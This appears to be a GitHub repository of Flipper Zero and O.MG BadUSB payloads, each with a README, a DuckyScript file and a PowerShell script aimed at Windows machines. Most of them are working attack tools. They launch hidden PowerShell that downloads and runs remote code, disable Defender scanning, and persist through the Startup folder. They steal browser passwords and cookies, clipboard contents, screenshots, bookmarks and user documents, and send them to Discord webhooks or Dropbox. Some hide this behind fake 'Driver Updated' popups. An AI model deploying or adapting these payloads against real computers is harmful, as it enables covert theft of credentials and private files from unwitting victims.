## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/RanFunWare/payload.txt ================================================ REM Title: RanFunWare REM Author: atomiczsec REM Description: This payload will prank your target into thinking their machine got hit with ransomware. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/RanFunWare/r.ps1 ================================================ #Hides Desktop Icons $Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 Get-Process "explorer"| Stop-Process #Changes Background #URL For the Image of your choice (Wanna Cry Ransomware Background) $url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" Invoke-WebRequest $url -OutFile C:\temp\test.jpg $setwallpapersrc = @" using System.Runtime.InteropServices; public class Wallpaper { public const int SetDesktopWallpaper = 20; public const int UpdateIniFile = 0x01; public const int SendWinIniChange = 0x02; [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); public static void SetWallpaper(string path) { SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); } } "@ Add-Type -TypeDefinition $setwallpapersrc [Wallpaper]::SetWallpaper("C:\temp\test.jpg") #Pop Up Message function MsgBox { [CmdletBinding()] param ( [Parameter (Mandatory = $True)] [Alias("m")] [string]$message, [Parameter (Mandatory = $False)] [Alias("t")] [string]$title, [Parameter (Mandatory = $False)] [Alias("b")] [ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] [string]$button, [Parameter (Mandatory = $False)] [Alias("i")] [ValidateSet('None','Hand','Question','Warning','Asterisk')] [string]$image ) Add-Type -AssemblyName PresentationCore,PresentationFramework if (!$title) {$title = " "} if (!$button) {$button = "OK"} if (!$image) {$image = "None"} [System.Windows.MessageBox]::Show($message,$title,$button,$image) } MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning ================================================ FILE: FlipperZero/payloads/Screen-Shock/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: FlipperZero/payloads/Screen-Shock/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Screen-Shock This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) ## Description This payload uses iwr to download 2 files * I.bat * c.ps1 **I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup **c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds Then the contents will then be sent to the DropBox for viewing pleasure ## Getting Started ### Dependencies * Pastebin or other file sharing service, Dropbox * Windows 10 * [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload

(back to top)

### Executing program * Plug in your device * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Screen-Shock/c.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } while(1){ Add-Type -AssemblyName System.Windows.Forms,System.Drawing $screens = [Windows.Forms.Screen]::AllScreens $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height) $bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height) $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png") $graphics.Dispose() $bmp.Dispose() start-sleep -Seconds 15 "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload } ================================================ FILE: FlipperZero/payloads/Screen-Shock/payload.txt ================================================ REM Title: Screen-Shock REM Author: atomiczsec REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) REM Target: Windows 10 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: FlipperZero/payloads/Screen-Shock/placeholder ================================================ ================================================ FILE: FlipperZero/payloads/Spotify-Spy/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Spotify-Spy This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. ## Description Have you ever been too afraid to ask your co-worker for what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their spotify username for you so you dont have to socially interact with anyone! ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Spotify-Spy/SS.ps1 ================================================ #Spotify-Spy # See if file is a thing Test-Path -Path "$env:APPDATA\Spotify\Users" #Create varible for file name $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt" # Gets the name of the spotify user cd "$env:APPDATA\Spotify\Users" Get-ChildItem > $F1 # Copy Spotify User to Temp Directory to get sent to Dropbox Copy-Item "$F1" -Destination "$env:tmp/$F1" function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" rm $F1 $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: FlipperZero/payloads/Spotify-Spy/payload.txt ================================================ REM Title: Spotify-Spy REM Author: atomiczsec REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/Water-UnMark/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Water-UnMark A payload to get rid of the ugly windows activation watermark. ## Description This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! ## Getting Started ### Dependencies * Unactivated Windows 10

(back to top)

### Executing program * Plug in your device ``` Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Water-UnMark/payload.txt ================================================ REM Title: Water-UnMark REM Author: atomiczsec REM Target OS: Windows 10 REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! DELAY 2000 GUI r DELAY 100 STRING powershell Start-Process powershell -verb runAs DELAY 1000 ALT Y DELAY 1000 STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ENTER DELAY 100 STRING Restart-Computer -Force ENTER ================================================ FILE: FlipperZero/payloads/Water-UnMark/placeholder ================================================ ================================================ FILE: FlipperZero/payloads/cApS-Troll/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# cApS-Troll This payload is meant to prank your victim with TURNING on AND off CAPS LOCK ## Description This payload is meant to prank your victim with TURNING on AND off CAPS LOCK ## Getting Started ### Dependencies * Pastebin or other file sharing service, Discord webhook or other webhook service * Windows 10,11 * [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

(back to top)

### Executing program * Plug in your device * Define the `DEFINE TARGET_URL example.com` * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/cApS-Troll/a.ps1 ================================================ while (1){ Start-Sleep -Second 45 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') } ================================================ FILE: FlipperZero/payloads/cApS-Troll/payload.txt ================================================ REM Title: cApS-Troll REM Author: atomiczsec REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: Functions/placeholder ================================================ ================================================ FILE: Functions/tidal-log.ps1 ================================================ # Define the Discord webhook URL $webhookUrl = "https://discord.com/api/webhooks/XXXXXXX" # Define the path to the app.log file $appLogPath = "$env:USERPROFILE\AppData\Roaming\TIDAL\Logs\app.log" # Check if the file exists if (Test-Path $appLogPath) { try { # Use curl to upload the file to the Discord webhook $curlCommand = "curl.exe -F 'file1=@$appLogPath' $webhookUrl" Invoke-Expression $curlCommand Write-Host "Successfully uploaded the log file to the Discord webhook." } catch { Write-Host "An error occurred while uploading the log file to the Discord webhook: $_" } } else { Write-Host "The file $appLogPath does not exist." } ================================================ FILE: OMG/payloads/Bookmark-Hog/BH.ps1 ================================================ #Bookmark-Hog # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The chrome bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The edge bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: OMG/payloads/Bookmark-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Bookmark-Hog A payload to exfiltrate bookmarks of the 2 most popular browsers ## Description This payload will enumerate through the browser directories, looking for the file that stores the bookmark history These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Bookmark-Hog/payload.txt ================================================ REM Title: Bookmark-Hog REM Author: atomiczsec REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Bookmark-Hog/placeholder ================================================ ================================================ FILE: OMG/payloads/Browser-Grab/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Browser-Grab A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers ## Description This payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers Finally, discord will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Admin privileges on the Device you are targeting * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Browser-Grab/b.ps1 ================================================ function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'YOUR-DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } # Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download Add-MpPreference -ExclusionPath $env:tmp # Download the exe and save it to temp directory iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe" # Execute the Browser Stealer cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait # Exfiltrate the loot to discord Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip Upload-Discord -file "$env:tmp\browserdata.zip" ================================================ FILE: OMG/payloads/Browser-Grab/payload.txt ================================================ REM Title: Browser-Grab REM Author: atomiczsec REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers REM Target: Windows 10 DELAY 2000 GUI r DELAY 1000 STRING powershell saps powershell -verb runas ENTER DELAY 1000 ALT y DELAY 1000 STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly ================================================ FILE: OMG/payloads/Copy-And-Waste/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: OMG/payloads/Copy-And-Waste/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Copy-And-Waste A payload to exfiltrate clipboard contents ## Description This payload uses iwr to download 2 files * I.bat * c.ps1 **I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup **c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click Then the contents will then be sent to the discord webhook for viewing pleasure For killing the script press both Ctrl buttons at the same time [It will resume at reboot] ## Getting Started ### Dependencies * Pastebin or other file sharing service, Discord webhook or other webhook service * Windows 10,11 * [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

(back to top)

### Executing program * Plug in your device * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Copy-And-Waste/c.ps1 ================================================ Add-Type -AssemblyName WindowsBase Add-Type -AssemblyName PresentationCore function dischat { [CmdletBinding()] param ( [Parameter (Position=0,Mandatory = $True)] [string]$con ) $hookUrl = 'YOUR DISCORD WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $con } Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body } dischat (get-clipboard) while (1){ $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl) $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c) $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x) if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)} elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit} else {continue} } ================================================ FILE: OMG/payloads/Copy-And-Waste/payload.txt ================================================ REM Title: Copy-And-Waste REM Author: atomiczsec & I am Jakoby REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook REM Target: Windows 10, 11 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: OMG/payloads/Copy-And-Waste/placeholder ================================================ ================================================ FILE: OMG/payloads/De-Bloater/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# De-Bloater A payload to quickly get "Windows10Debloater" ## Description This script will download "Windows10Debloater" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more... ## Getting Started ### Dependencies * Windows 10

(back to top)

### Executing program * Plug in your device ``` iwr -useb https://git.io/debloat|iex ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) [Sycnex](https://github.com/Sycnex/Windows10Debloater) [I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby) * [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)

(back to top)

================================================ FILE: OMG/payloads/Doc-Hog/d.ps1 ================================================ function Doc-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse $types = @{ "*.docx" = "Word"; "*.doc" = "Word"; "*.pptx" = "PowerPoint"; "*.xlsx" = "Excel"; "*.pdf" = "PDF"; "*.jpeg" = "JPEG"; "*.png" = "PNG"; "*.jpg" = "JPEG"; "*.csv" = "CSV"; "*.txt" = "Text"; } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object {$_.Name -like $type} if ($filteredFiles) { $zipFile = "$env:TEMP\$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } ================================================ FILE: OMG/payloads/Doc-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. DEFINE URL http://new-url.com/powershell.ps1 REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Doc-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Doc-Hog A payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV ## Description This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact
Link

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

